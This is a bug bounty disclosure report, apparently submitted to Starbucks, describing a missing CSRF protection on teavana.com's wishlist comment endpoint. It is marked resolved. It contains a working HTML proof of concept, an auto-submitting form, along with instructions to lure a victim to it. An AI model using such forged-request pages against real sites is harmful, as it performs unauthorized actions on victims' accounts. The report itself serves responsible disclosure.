CSRF exploit | Adding/Editing comment of wishlist items (teavana.com - Wishlist-Comments)
Medium
S
Starbucks
Submitted None
Actions:
Reported by
faisalahmed
Vulnerability Details
Technical details and impact analysis
Hello Team,
I noticed there is no CSRF protection in Adding/Editing comment of wishlist items.
AREA: https://www.teavana.com/us/en/my-wishlist
Attacker could take advantage of this issue and exploit victim remotely.
####POC:
Method: **POST**
POST URL: https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/C1495572478
*here `C1495572478` is wishlist id number*
Post Contents:
```
wishlistComment=comment
```
HTML POC to reproduce:
```
<html>
<head><title>CSRF POC</title></head>
<body onLoad="document.forms[0].submit()">
<form action="https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/C1495572478" method="POST">
<input type="text" name="wishlistComment" value="comment"><br>
<input type="text" name="save" value="Save"><br>
</form>
</body>
</html>
```
* Save this snippet as HTML.
* Make your victim visit the snippet/link.
* comment will be added/edited automatically.
Hope you'll fix this one.
Looking forward!
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)